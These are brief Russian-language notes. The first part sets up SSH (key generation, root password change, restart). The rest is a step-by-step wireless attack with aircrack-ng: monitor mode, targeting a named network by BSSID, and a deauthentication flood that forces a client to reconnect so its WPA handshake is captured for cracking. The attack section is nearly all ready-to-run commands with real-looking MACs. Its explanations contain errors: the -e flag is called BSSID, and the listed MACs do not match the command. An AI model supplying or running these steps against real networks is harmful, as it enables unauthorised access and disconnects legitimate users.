1. надо сгенерировать ключи:
sshd-generate
2. Сменить пароль root
passwd
3. Перезапустить ssh
service ssh restart
1. Смотрим какие есть интерфейсы, поддерживающие беспроводные расширения:
iwconfig
2. Переводим интерфейс в режим мониторинга:
airmon-ng start wlan0
В результате появится интерфейс mon0, который будет виден в iwconfig
3. Сканируем эфир и выбираем сеть. Указываем интерфейс mon0:
airodump-ng mon0
4. Запускаем airodump нацеленный на выбранную сеть, указываем канал -c 1. Тут output - это имя выходного файла.
airodump-ng -c 1 --bssid 48:5B:39:E7:BE:31 -w output mon0
5. Если клиент уже подключен, запускаем aireplay и обрываем его аутентификацию, тем самым заставляя его соединиться заново:
aireplay-ng -0 1 -e mikehome -a 48:5B:39:E7:BE:31 -c 00:26:5A:18:A5:C5 mon0
где:
-e mikehome — BSSID точки доступа
-a 00:14:6C:7E:40:80 — MAC точки доступа
-c 00:0F:B5:FD:FB:C2 — MAC клиента
И на выходе получаем:
11:09:28 Sending DeAuth to station – STMAC: [00:0F:B5:34:30:30]
Тыкать aireplay можно довольно долго, но в конце-концов в окне с airodump-ng появится справа:
WPA handshake: 48:5B:39:E7:BE:31